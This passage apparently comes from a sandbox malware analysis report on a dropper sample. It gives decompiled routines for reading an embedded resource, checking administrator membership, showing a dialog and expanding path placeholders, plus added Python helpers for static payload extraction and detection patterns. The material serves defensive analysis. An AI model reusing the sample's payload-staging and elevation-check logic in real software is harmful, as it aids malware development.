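    DWORD GroupCount, SID_AND_ATTRIBUTES[GroupCount] {PSID Sid; DWORD Attributes}, then the SID bodies.
    `base` is the virtual address of the buffer; the PSID fields are absolute pointers into it."""
    cursor = 4 + 8 * len(groups)
    entries, bodies = b"", b""
    for sid, attrs in groups:
        entries += struct.pack("<II", base + cursor, attrs)
        bodies += sid
        cursor += len(sid)
    return struct.pack("<I", len(groups)) + entries + bodies


def parse_token_groups(buf, base):
    """Inverse of build_token_groups: recover [(sid_bytes, attributes)] from a captured TOKEN_GROUPS buffer."""
    (count,) = struct.unpack_from("<I", buf, 0)
    groups = []
    for i in range(count):
        psid, attrs = struct.unpack_from("<II", buf, 4 + 8 * i)
        off = psid - base
        sid_len = 8 + 4 * buf[off + 1]  # 8-byte header plus one DWORD per sub-authority
        groups.append((buf[off:off + sid_len], attrs))
    return groups


def is_admin_equalsid_scan(groups):
    """The check the API sequence implies: any group SID EqualSid to BUILTIN\\Administrators."""
    return any(equal_sid(sid, ADMINISTRATORS) for sid, _attrs in groups)


def is_admin_effective(groups):
    """What CheckTokenMembership answers: the SID must be present, enabled and not deny-only.
    A UAC-filtered administrator token keeps S-1-5-32-544 but flags it SE_GROUP_USE_FOR_DENY_ONLY."""
    for sid, attrs in groups:
        if equal_sid(sid, ADMINISTRATORS):
            return bool(attrs & SE_GROUP_ENABLED) and not attrs & SE_GROUP_USE_FOR_DENY_ONLY
    return False


# Constructed token contents (not captured from the sample): an elevated token and the
# UAC-filtered token of the same user, as a 32-bit process would see them.
_NORMAL = SE_GROUP_MANDATORY | SE_GROUP_ENABLED_BY_DEFAULT | SE_GROUP_ENABLED
ELEVATED_TOKEN_GROUPS = [(EVERYONE, _NORMAL), (ADMINISTRATORS, _NORMAL), (USERS, _NORMAL)]
FILTERED_TOKEN_GROUPS = [(EVERYONE, _NORMAL), (ADMINISTRATORS, SE_GROUP_USE_FOR_DENY_ONLY), (USERS, _NORMAL)]
TOKEN_BUFFER_BASE = 0x00410000  # assumed LocalAlloc address for the constructed buffers


if __name__ == "__main__":
    for label, groups in (("elevated", ELEVATED_TOKEN_GROUPS), ("filtered", FILTERED_TOKEN_GROUPS)):
        parsed = parse_token_groups(build_token_groups(TOKEN_BUFFER_BASE, groups), TOKEN_BUFFER_BASE)
        print(label, [sid_to_string(s) for s, _ in parsed],
              "equalsid_scan=%s effective=%s" % (is_admin_equalsid_scan(parsed), is_admin_effective(parsed)))
```

When triaging a sample, the 16-byte pattern 01 02 00 00 00 00 00 05 20 00 00 00 20 02 00 00 in a dump, or the 2/0x20/0x220 argument triple in an AllocateAndInitializeSid call, is the quickest way to recognise this check; the filtered-token case is why a stealer that relies on the plain EqualSid scan may believe it is elevated when it is not.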

                                                                                                                                                                                                    C-Code - Quality: 82%
                                                                                                                                                                                                    			E0013468F(CHAR* __ecx, void* __edx, intOrPtr _a4) {
                                                                                                                                                                                                    				// __ecx: resource name ("TITLE" at the recorded call site), __edx: destination buffer, _a4: its size in bytes
                                                                                                                                                                                                    				long _t4;
                                                                                                                                                                                                    				void* _t11;
                                                                                                                                                                                                    				CHAR* _t14;
                                                                                                                                                                                                    				void* _t15;
                                                                                                                                                                                                    				long _t16;
                                                                                                                                                                                                    
                                                                                                                                                                                                    				_t14 = __ecx;
                                                                                                                                                                                                    				_t11 = __edx;
                                                                                                                                                                                                    				// 0xa is RT_RCDATA; hModule 0 means the resource is looked up in the main executable image
                                                                                                                                                                                                    				_t4 = SizeofResource(0, FindResourceA(0, __ecx, 0xa));
                                                                                                                                                                                                    				_t16 = _t4;
                                                                                                                                                                                                    				// Copy only when the resource fits the caller's buffer and a destination was supplied;
                                                                                                                                                                                                    				// every other call just reports the size, so a first call with _a4 == 0 works as a size probe
                                                                                                                                                                                                    				if(_t16 <= _a4 && _t11 != 0) {
                                                                                                                                                                                                    					if(_t16 == 0) {
                                                                                                                                                                                                    						L5:
                                                                                                                                                                                                    						return 0;        // resource missing or empty, or LockResource failed
                                                                                                                                                                                                    					}
                                                                                                                                                                                                    					_t15 = LockResource(LoadResource(0, FindResourceA(0, _t14, 0xa)));
                                                                                                                                                                                                    					if(_t15 == 0) {
                                                                                                                                                                                                    						goto L5;
                                                                                                                                                                                                    					}
                                                                                                                                                                                                    					// memcpy_s(dest, destSize, src, count): the size check above keeps count within destSize
                                                                                                                                                                                                    					__imp__memcpy_s(_t11, _a4, _t15, _t16);
                                                                                                                                                                                                    					FreeResource(_t15);
                                                                                                                                                                                                    					return _t16;     // bytes copied
                                                                                                                                                                                                    				}
                                                                                                                                                                                                    				return _t4;          // resource size, nothing copied
                                                                                                                                                                                                    			}

                                                                                                                                                                                                    Instruction addresses for the decompiled lines above (0x00000000 marks a line with no address): 0x00134699, 0x0013469b, 0x001346a9, 0x001346af, 0x001346b4, 0x001346bc, 0x001346f9, 0x00000000, 0x001346f9, 0x001346d9, 0x001346dd, 0x00000000, 0x00000000, 0x001346e5, 0x001346ef, 0x00000000, 0x001346f5, 0x001346ff

                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 001346A0
                                                                                                                                                                                                    • SizeofResource.KERNEL32(00000000,00000000,?,00132D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 001346A9
                                                                                                                                                                                                    • FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 001346C3
                                                                                                                                                                                                    • LoadResource.KERNEL32(00000000,00000000,?,00132D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 001346CC
                                                                                                                                                                                                    • LockResource.KERNEL32(00000000,?,00132D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 001346D3
                                                                                                                                                                                                    • memcpy_s.MSVCRT ref: 001346E5
                                                                                                                                                                                                    • FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 001346EF
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000002.00000002.382982435.0000000000131000.00000020.00000001.01000000.00000005.sdmp, Offset: 00130000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000002.00000002.382948805.0000000000130000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                    • Associated: 00000002.00000002.382996409.0000000000138000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                    • Associated: 00000002.00000002.383006751.000000000013A000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                    • Associated: 00000002.00000002.383006751.000000000013C000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_130000_plct23La85.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Resource$Find$FreeLoadLockSizeofmemcpy_s
                                                                                                                                                                                                    • String ID: TITLE$nst0dum
                                                                                                                                                                                                    • API String ID: 3370778649-1250357435
                                                                                                                                                                                                    • Opcode ID: a8d4bccaffe46535eea34181cf3b2ddabc706a1771cef8b83fdc34caf19d75a3
                                                                                                                                                                                                    • Instruction ID: c166e6b35abfbbdecb06ce3de2d1f08c7f08fdf218e5767775543589e664c09e
                                                                                                                                                                                                    • Opcode Fuzzy Hash: a8d4bccaffe46535eea34181cf3b2ddabc706a1771cef8b83fdc34caf19d75a3
                                                                                                                                                                                                    • Instruction Fuzzy Hash: BB01A4762443107BE3201BA56C4EF6B7E2CDFCAF62F840014FB8997191CAB1988586B6
                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                    Uniqueness Score: -1.00%
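E0013468F above is the loader's resource reader: FindResourceA(NULL, "TITLE", 0xA) resolves an RT_RCDATA (type 10) resource named TITLE in the module's own image, and the copy into the caller's buffer only happens when the resource fits, so a call with a zero-sized buffer returns the size and a second call fetches the bytes. The Python below is an added example, not part of the report or of the sample: it constructs a minimal .rsrc directory tree (the section RVA 0x5000 and the payload bytes are assumed, constructed values), resolves a resource the way FindResource does (type, then name compared case-insensitively, then the first language entry) and mirrors the size-probe/copy semantics of the decompiled function. The same walk, pointed at the real file's resource section, is how you pull the embedded payload out of the dropper on disk without executing it.

```python
import struct

RT_RCDATA = 10            # the 0xA passed to FindResourceA(NULL, "TITLE", 0xA)
LANG_EN_US = 0x0409
SUBDIR_FLAG = 0x80000000  # high bit of OffsetToData: the entry points at a sub-directory
NAME_FLAG = 0x80000000    # high bit of Name: the entry carries a string name, not an integer ID
RSRC_RVA = 0x5000         # assumed RVA of the constructed .rsrc section


def _directory(entries):
    """IMAGE_RESOURCE_DIRECTORY (16 bytes) followed by IMAGE_RESOURCE_DIRECTORY_ENTRY records (8 bytes each).
    Named entries precede ID entries, as the loader expects."""
    entries = sorted(entries, key=lambda e: not (e[0] & NAME_FLAG))
    named = sum(1 for name, _ in entries if name & NAME_FLAG)
    header = struct.pack("<IIHHHH", 0, 0, 0, 0, named, len(entries) - named)
    return header + b"".join(struct.pack("<II", name, off) for name, off in entries)


def build_rsrc_section(rsrc_rva, name, payload, lang=LANG_EN_US):
    """Construct a minimal .rsrc section holding one RT_RCDATA resource called `name`:
    type dir -> name dir -> language dir, then the name string, the data entry and the payload."""
    dir_size = 16 + 8
    off_name_dir, off_lang_dir, off_str = dir_size, 2 * dir_size, 3 * dir_size
    name_u16 = name.encode("utf-16-le")
    off_data_entry = off_str + 2 + len(name_u16)
    off_payload = off_data_entry + 16
    type_dir = _directory([(RT_RCDATA, SUBDIR_FLAG | off_name_dir)])
    name_dir = _directory([(NAME_FLAG | off_str, SUBDIR_FLAG | off_lang_dir)])
    lang_dir = _directory([(lang, off_data_entry)])       # leaf: points at IMAGE_RESOURCE_DATA_ENTRY
    name_str = struct.pack("<H", len(name)) + name_u16     # length-prefixed UTF-16, no terminator
    data_entry = struct.pack("<IIII", rsrc_rva + off_payload, len(payload), 0, 0)  # OffsetToData is an RVA
    return type_dir + name_dir + lang_dir + name_str + data_entry + payload


def _entries(blob, off):
    named, ids = struct.unpack_from("<HH", blob, off + 12)
    for i in range(named + ids):
        yield struct.unpack_from("<II", blob, off + 16 + 8 * i)


def _entry_name(blob, field):
    if field & NAME_FLAG:
        off = field & 0x7FFFFFFF
        (n,) = struct.unpack_from("<H", blob, off)
        return blob[off + 2:off + 2 + 2 * n].decode("utf-16-le")
    return field


def _matches(blob, field, wanted):
    got = _entry_name(blob, field)
    if isinstance(wanted, str):
        return isinstance(got, str) and got.upper() == wanted.upper()  # FindResource names are case-insensitive
    return got == wanted


def find_resource(blob, rsrc_rva, res_type, name):
    """Static FindResource + LoadResource + LockResource + SizeofResource: walk type -> name -> language
    and return the bytes of the first language entry, or None when the lookup fails."""
    for type_field, type_off in _entries(blob, 0):
        if not _matches(blob, type_field, res_type):
            continue
        for name_field, name_off in _entries(blob, type_off & 0x7FFFFFFF):
            if not _matches(blob, name_field, name):
                continue
            for _lang, data_off in _entries(blob, name_off & 0x7FFFFFFF):
                data_rva, size = struct.unpack_from("<II", blob, data_off & 0x7FFFFFFF)
                start = data_rva - rsrc_rva
                return blob[start:start + size]
    return None


def read_rcdata(blob, rsrc_rva, name, dest_capacity, dest_supplied=True):
    """Mirror of E0013468F: return (size, data). The copy happens only when the resource fits the
    caller's buffer and a destination was supplied; otherwise only the size is reported, which is how
    a caller probes the size first (dest_capacity=0). A missing resource reads as size 0."""
    data = find_resource(blob, rsrc_rva, RT_RCDATA, name)
    size = 0 if data is None else len(data)
    if size <= dest_capacity and dest_supplied and size != 0:
        return size, data
    return size, None


# Constructed payload (not the sample's resource content), just to exercise the walker.
SAMPLE_PAYLOAD = b"MZ\x90\x00" + bytes(range(32))
SAMPLE_RSRC = build_rsrc_section(RSRC_RVA, "TITLE", SAMPLE_PAYLOAD)


if __name__ == "__main__":
    size, _ = read_rcdata(SAMPLE_RSRC, RSRC_RVA, "TITLE", 0)        # size probe
    print("TITLE is %d bytes" % size)
    size, data = read_rcdata(SAMPLE_RSRC, RSRC_RVA, "title", size)  # bounded copy
    print("copied %d bytes, starts with %r" % (size, data[:4]))
```

On a real file, take the resource directory RVA from the optional header's data directory entry 2, map it to the file offset through the section table, and pass the section bytes and that RVA to find_resource; the payload RVA inside the data entry is converted back to a section offset the same way.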

                                                                                                                                                                                                    C-Code - Quality: 57%
                                                                                                                                                                                                    			E001317EE(intOrPtr* __ecx) {
                                                                                                                                                                                                    				signed int _v8;
                                                                                                                                                                                                    				short _v12;
                                                                                                                                                                                                    				struct _SID_IDENTIFIER_AUTHORITY _v16;
                                                                                                                                                                                                    				_Unknown_base(*)()* _v20;
                                                                                                                                                                                                    				void* _v24;
                                                                                                                                                                                                    				intOrPtr* _v28;
                                                                                                                                                                                                    				void* __ebx;
                                                                                                                                                                                                    				void* __edi;
                                                                                                                                                                                                    				void* __esi;
                                                                                                                                                                                                    				signed int _t14;
                                                                                                                                                                                                    				_Unknown_base(*)()* _t20;
                                                                                                                                                                                                    				long _t28;
                                                                                                                                                                                                    				void* _t35;
                                                                                                                                                                                                    				struct HINSTANCE__* _t36;
                                                                                                                                                                                                    				signed int _t38;
                                                                                                                                                                                                    				intOrPtr* _t39;
                                                                                                                                                                                                    
                                                                                                                                                                                                    				_t14 =  *0x138004; // 0xe764604f
                                                                                                                                                                                                    				_v8 = _t14 ^ _t38;
                                                                                                                                                                                                    				_v12 = 0x500;
                                                                                                                                                                                                    				_t37 = __ecx;
                                                                                                                                                                                                    				_v16.Value = 0;
                                                                                                                                                                                                    				_v28 = __ecx;
                                                                                                                                                                                                    				_t28 = 0;
                                                                                                                                                                                                    				_t36 = LoadLibraryA("advapi32.dll");
                                                                                                                                                                                                    				if(_t36 != 0) {
                                                                                                                                                                                                    					_t20 = GetProcAddress(_t36, "CheckTokenMembership");
                                                                                                                                                                                                    					_v20 = _t20;
                                                                                                                                                                                                    					if(_t20 != 0) {
                                                                                                                                                                                                    						 *_t37 = 0;
                                                                                                                                                                                                    						_t28 = 1;
                                                                                                                                                                                                    						if(AllocateAndInitializeSid( &_v16, 2, 0x20, 0x220, 0, 0, 0, 0, 0, 0,  &_v24) != 0) {
                                                                                                                                                                                                    							_t37 = _t39;
                                                                                                                                                                                                    							 *0x13a288(0, _v24, _v28);
                                                                                                                                                                                                    							_v20();
                                                                                                                                                                                                    							if(_t39 != _t39) {
                                                                                                                                                                                                    								asm("int 0x29");
                                                                                                                                                                                                    							}
                                                                                                                                                                                                    							FreeSid(_v24);
                                                                                                                                                                                                    						}
                                                                                                                                                                                                    					}
                                                                                                                                                                                                    					FreeLibrary(_t36);
                                                                                                                                                                                                    				}
                                                                                                                                                                                                    				return E00136CE0(_t28, _t28, _v8 ^ _t38, _t35, _t36, _t37);
                                                                                                                                                                                                    			}

                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • LoadLibraryA.KERNEL32(advapi32.dll,00000002,?,00000000,?,?,?,001318DD), ref: 0013181A
                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,CheckTokenMembership), ref: 0013182C
                                                                                                                                                                                                    • AllocateAndInitializeSid.ADVAPI32(001318DD,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,?,001318DD), ref: 00131855
                                                                                                                                                                                                    • FreeSid.ADVAPI32(?,?,?,?,001318DD), ref: 00131883
                                                                                                                                                                                                    • FreeLibrary.KERNEL32(00000000,?,?,?,001318DD), ref: 0013188A
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000002.00000002.382982435.0000000000131000.00000020.00000001.01000000.00000005.sdmp, Offset: 00130000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000002.00000002.382948805.0000000000130000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                    • Associated: 00000002.00000002.382996409.0000000000138000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                    • Associated: 00000002.00000002.383006751.000000000013A000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                    • Associated: 00000002.00000002.383006751.000000000013C000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_130000_plct23La85.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: FreeLibrary$AddressAllocateInitializeLoadProc
                                                                                                                                                                                                    • String ID: CheckTokenMembership$advapi32.dll
                                                                                                                                                                                                    • API String ID: 4204503880-1888249752
                                                                                                                                                                                                    • Opcode ID: 08a99711796522a1e77c54e57ce98e3ca969caac70621c03c45f4da2c857e3b8
                                                                                                                                                                                                    • Instruction ID: f4e224e3f19b3f3bc337f1c7142674bfc3de73ec6a9d875ebec38debedd4319f
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 08a99711796522a1e77c54e57ce98e3ca969caac70621c03c45f4da2c857e3b8
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 3311B271E00209BFDB149FA4EC49ABEBBB8EF48701F500169FA45E3290DB309D418B95
                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                                                                    			E00133450(struct HWND__* _a4, intOrPtr _a8, int _a12) {
                                                                                                                                                                                                    				void* _t7;
                                                                                                                                                                                                    				void* _t11;
                                                                                                                                                                                                    				struct HWND__* _t12;
                                                                                                                                                                                                    				int _t22;
                                                                                                                                                                                                    				struct HWND__* _t24;
                                                                                                                                                                                                    
                                                                                                                                                                                                    				_t7 = _a8 - 0x10;
                                                                                                                                                                                                    				if(_t7 == 0) {
                                                                                                                                                                                                    					EndDialog(_a4, 2);
                                                                                                                                                                                                    					L11:
                                                                                                                                                                                                    					return 1;
                                                                                                                                                                                                    				}
                                                                                                                                                                                                    				_t11 = _t7 - 0x100;
                                                                                                                                                                                                    				if(_t11 == 0) {
                                                                                                                                                                                                    					_t12 = GetDesktopWindow();
                                                                                                                                                                                                    					_t24 = _a4;
                                                                                                                                                                                                    					E001343D0(_t24, _t12);
                                                                                                                                                                                                    					SetWindowTextA(_t24, "nst0dum");
                                                                                                                                                                                                    					SetDlgItemTextA(_t24, 0x838,  *0x139404);
                                                                                                                                                                                                    					SetForegroundWindow(_t24);
                                                                                                                                                                                                    					goto L11;
                                                                                                                                                                                                    				}
                                                                                                                                                                                                    				if(_t11 == 1) {
                                                                                                                                                                                                    					_t22 = _a12;
                                                                                                                                                                                                    					if(_t22 < 6) {
                                                                                                                                                                                                    						goto L11;
                                                                                                                                                                                                    					}
                                                                                                                                                                                                    					if(_t22 <= 7) {
                                                                                                                                                                                                    						L8:
                                                                                                                                                                                                    						EndDialog(_a4, _t22);
                                                                                                                                                                                                    						return 1;
                                                                                                                                                                                                    					}
                                                                                                                                                                                                    					if(_t22 != 0x839) {
                                                                                                                                                                                                    						goto L11;
                                                                                                                                                                                                    					}
                                                                                                                                                                                                    					 *0x1391dc = 1;
                                                                                                                                                                                                    					goto L8;
                                                                                                                                                                                                    				}
                                                                                                                                                                                                    				return 0;
                                                                                                                                                                                                    			}
                                                                                                                                                                                                    0x0013347c
                                                                                                                                                                                                    0x0013348c
                                                                                                                                                                                                    0x00133490
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00133496
                                                                                                                                                                                                    0x00133484
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00133486
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00133486
                                                                                                                                                                                                    0x00000000

APIs
• EndDialog.USER32(?,?), ref: 00133490
• GetDesktopWindow.USER32 ref: 0013349A
• SetWindowTextA.USER32(?,nst0dum), ref: 001334B2
• SetDlgItemTextA.USER32(?,00000838), ref: 001334C4
• SetForegroundWindow.USER32(?), ref: 001334CB
• EndDialog.USER32(?,00000002), ref: 001334D8
Strings
Memory Dump Source
• Source File: 00000002.00000002.382982435.0000000000131000.00000020.00000001.01000000.00000005.sdmp, Offset: 00130000, based on PE: true
• Associated: 00000002.00000002.382948805.0000000000130000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.382996409.0000000000138000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.383006751.000000000013A000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.383006751.000000000013C000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_130000_plct23La85.jbxd
Similarity
• API ID: Window$DialogText$DesktopForegroundItem
• String ID: nst0dum
• API String ID: 852535152-432003757
• Opcode ID: 0d73a0dcfc01b6536fcca301c769946e307fb6709c9da55ad06d3aea81b682b0
• Instruction ID: 9ff6d673934f57fdc2daf560bd536017aca71a908a7a5cb09d9ce611d2353c58
• Opcode Fuzzy Hash: 0d73a0dcfc01b6536fcca301c769946e307fb6709c9da55ad06d3aea81b682b0
• Instruction Fuzzy Hash: 5A01F231240124ABCB1A5F69DC0C9AE7B64EF09710F408010FAAB96DA1CB719F82DBD9
Uniqueness
• Uniqueness Score: -1.00%

C-Code - Quality: 95%
			// Decompiler output as reported by Joe Sandbox; the comments are editorial.
			// The routine copies the template at __ecx into the buffer at _a4, expanding
			// "#E" to the module's own path, "#D" to that path cut down to its directory,
			// and "##" to a single '#'. E001317C8, E00131680 and E001365E8 are unresolved
			// helpers; __edx (_t44) is only passed through to E001317C8 and is presumably
			// the limit of the output buffer.
			E00132AAC(CHAR* __ecx, char* __edx, CHAR* _a4) {
				signed int _v8;      // /GS stack cookie
				char _v268;          // 0x104-byte path buffer filled by GetModuleFileNameA
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t16;
				int _t21;
				char _t32;
				intOrPtr _t34;
				char* _t38;
				char _t42;
				char* _t44;
				CHAR* _t52;
				intOrPtr* _t55;
				CHAR* _t59;
				void* _t62;
				CHAR* _t64;
				CHAR* _t65;
				signed int _t66;

				_t60 = __edx;
				_t16 =  *0x138004; // 0xe764604f  (security cookie global)
				_t17 = _t16 ^ _t66;
				_v8 = _t16 ^ _t66;
				_t65 = _a4;          // destination cursor
				_t44 = __edx;
				_t64 = __ecx;        // source (template) cursor
				if( *((char*)(__ecx)) != 0) {   // empty template: nothing is written, not even a terminator
					GetModuleFileNameA( *0x139a3c,  &_v268, 0x104);   // *0x139a3c: module handle global
					while(1) {
						_t17 =  *_t64;
						if(_t17 == 0) {
							break;
						}
						_t21 = IsDBCSLeadByte(_t17);
						 *_t65 =  *_t64;   // copy the byte (plus its trail byte for a DBCS lead byte)
						if(_t21 != 0) {
							_t65[1] = _t64[1];
						}
						if( *_t64 != 0x23) {   // 0x23 = '#'
							L19:
							_t65 = CharNextA(_t65);
						} else {
							_t64 = CharNextA(_t64);   // look at the character after '#'
							if(CharUpperA( *_t64) != 0x44) {        // 0x44 = 'D'
								if(CharUpperA( *_t64) != 0x45) {    // 0x45 = 'E'
									if( *_t64 == 0x23) {             // "##": keep the '#' already written
										goto L19;
									}
									// any other "#x": the '#' is left unadvanced and overwritten, x is skipped
								} else {
									// "#E": append the path buffer, then advance _t65 by strlen(_t65)
									E00131680(_t65, E001317C8(_t44, _t65),  &_v268);
									_t52 = _t65;
									_t14 =  &(_t52[1]); // 0x2
									_t60 = _t14;
									do {
										_t32 =  *_t52;
										_t52 =  &(_t52[1]);
									} while (_t32 != 0);
									goto L17;
								}
							} else {
								// "#D": E001365E8 is called for its side effect on _v268 (return value
								// discarded), so the buffer is modified in place and the change persists
								// for any later "#E"; a trailing '\' is then removed explicitly
								E001365E8( &_v268);
								_t55 =  &_v268;
								_t62 = _t55 + 1;
								do {
									_t34 =  *_t55;
									_t55 = _t55 + 1;
								} while (_t34 != 0);
								_t38 = CharPrevA( &_v268,  &(( &_v268)[_t55 - _t62]));   // last character
								if(_t38 != 0 &&  *_t38 == 0x5c) {   // 0x5c = '\'
									 *_t38 = 0;
								}
								E00131680(_t65, E001317C8(_t44, _t65),  &_v268);
								_t59 = _t65;
								_t12 =  &(_t59[1]); // 0x2
								_t60 = _t12;
								do {
									_t42 =  *_t59;
									_t59 =  &(_t59[1]);
								} while (_t42 != 0);
								L17:
								_t65 =  &(_t65[_t52 - _t60]);   // += strlen(_t65); _t52 and _t59 are the same register
							}
						}
						_t64 = CharNextA(_t64);
					}
					 *_t65 = _t17;   // _t17 == 0 here: terminate the output
				}
				return E00136CE0(_t17, _t44, _v8 ^ _t66, _t60, _t64, _t65);   // cookie check epilogue
                                                                                                                                                                                                    			}
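The routine above reads as a placeholder expander that rewrites a template into a path relative to the running module. The following Python is an added re-implementation of that reading for use in analysis tooling; it is not code from the sample or from the report. It assumes that E001365E8 strips the file name from the path buffer in place while keeping the separator (which is why the decompilation then zeroes a trailing backslash via CharPrevA), that E001317C8/E00131680 together form a bounded string copy, and that the caller supplies the GetModuleFileNameA result as `module_path`. The names `expand_placeholders` and `demo` and the sample path are the editor's; DBCS lead-byte handling is omitted because Python strings are not byte pairs.

```python
# Added example: Python re-implementation of the placeholder expansion that
# the decompiled routine E00132AAC appears to perform. Not the sample's code.
#
# Assumptions (the report leaves these helpers unresolved):
#   - E001365E8(&buf) strips the file name from buf in place, keeping the
#     trailing separator; the decompilation then zeroes that '\' via CharPrevA.
#   - E001317C8/E00131680 are a bounded copy of buf into the output.
#   - GetModuleFileNameA's result is supplied by the caller (module_path).

def expand_placeholders(template: str, module_path: str) -> str:
    """Expand '#E', '#D' and '##' in template the way E00132AAC does.

    '#E' -> current contents of the path buffer (initially the module path)
    '#D' -> path buffer truncated to its directory, no trailing backslash
    '##' -> a single '#'
    '#x' -> any other x: both characters are dropped (the '#' written to the
            output is never advanced past, so the next copy overwrites it)
    """
    buf = module_path            # mirrors the shared _v268 buffer
    out = []
    i, n = 0, len(template)
    while i < n:
        c = template[i]
        if c != '#':
            out.append(c)        # plain character: copy, CharNextA on both sides
            i += 1
            continue
        i += 1                   # _t64 = CharNextA(_t64): the char after '#'
        if i >= n:
            break                # lone trailing '#': loop ends on NUL, '#' overwritten
        tag = template[i]
        if tag.upper() == 'D':
            k = buf.rfind('\\')
            if k >= 0:
                buf = buf[:k + 1]      # assumed E001365E8: drop file name, keep '\'
            if buf.endswith('\\'):
                buf = buf[:-1]         # the CharPrevA check: zero a trailing '\'
            out.append(buf)            # copy, then advance dest by strlen (label L17)
        elif tag.upper() == 'E':
            out.append(buf)
        elif tag == '#':
            out.append('#')            # "##": keep the '#' already written
        # any other tag: nothing copied, both '#' and the tag are consumed
        i += 1                   # the loop-tail _t64 = CharNextA(_t64)
    return ''.join(out)


def demo() -> dict:
    """Constructed inputs exercising each branch, including the in-place
    truncation of the shared buffer that makes a later '#E' yield the
    directory rather than the full path."""
    exe = 'C:\\Users\\victim\\Downloads\\file.exe'   # constructed sample path
    return {
        'full': expand_placeholders('#E', exe),
        'dir_file': expand_placeholders('#D\\data.bin', exe),
        'escapes': expand_placeholders('a##b#Xc#', exe),
        'persistent': expand_placeholders('#D;#E', exe),
    }


if __name__ == '__main__':
    for name, value in demo().items():
        print(f'{name:10s} {value}')
```

The `persistent` case is the one worth remembering when reading the decompilation: because both the helper call and the CharPrevA zeroing modify `_v268` itself, every `#E` after a `#D` in the same template expands to the directory, not the module path.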

                                                                                                                                                                                                     Instruction addresses (disassembly address column; the instruction text itself was not extracted): 0x00132aac 0x00132ab7 0x00132abc 0x00132abe 0x00132ac3 0x00132ac6 0x00132ac9 0x00132ace 0x00132ae6 0x00132bdc 0x00132bdc 0x00132be0 0x00000000 0x00000000 0x00132af2 0x00132afc 0x00132b00 0x00132b05 0x00132b05 0x00132b0b 0x00132bca 0x00132bd1 0x00132b11 0x00132b18 0x00132b26 0x00132b99 0x00132bc8 0x00000000 0x00000000 0x00132b9b 0x00132bae 0x00132bb3 0x00132bb5 0x00132bb5 0x00132bb8 0x00132bb8 0x00132bba 0x00132bbb 0x00000000 0x00132bb8 0x00132b28 0x00132b2e 0x00132b33 0x00132b39 0x00132b3c 0x00132b3c 0x00132b3e 0x00132b3f 0x00132b55 0x00132b5d 0x00132b64 0x00132b64 0x00132b7a 0x00132b7f 0x00132b81 0x00132b81 0x00132b84 0x00132b84 0x00132b86 0x00132b87 0x00132bbf 0x00132bc1 0x00132bc1 0x00132b26 0x00132bda 0x00132bda 0x00132be6 0x00132be6 0x00132bf8

                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • GetModuleFileNameA.KERNEL32(?,00000104,00000000,00000000,?), ref: 00132AE6
                                                                                                                                                                                                    • IsDBCSLeadByte.KERNEL32(00000000), ref: 00132AF2
                                                                                                                                                                                                    • CharNextA.USER32(?), ref: 00132B12
                                                                                                                                                                                                    • CharUpperA.USER32 ref: 00132B1E
                                                                                                                                                                                                    • CharPrevA.USER32(?,?), ref: 00132B55
                                                                                                                                                                                                    • CharNextA.USER32(?), ref: 00132BD4
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000002.00000002.382982435.0000000000131000.00000020.00000001.01000000.00000005.sdmp, Offset: 00130000, based on PE: true
                                                                                                                                                                                                     • Associated: 00000002.00000002.382948805.0000000000130000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                     • Associated: 00000002.00000002.382996409.0000000000138000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                     • Associated: 00000002.00000002.383006751.000000000013A000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                     • Associated: 00000002.00000002.383006751.000000000013C000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_130000_plct23La85.jbxd
                                                                                                                                                                                                    Similarity
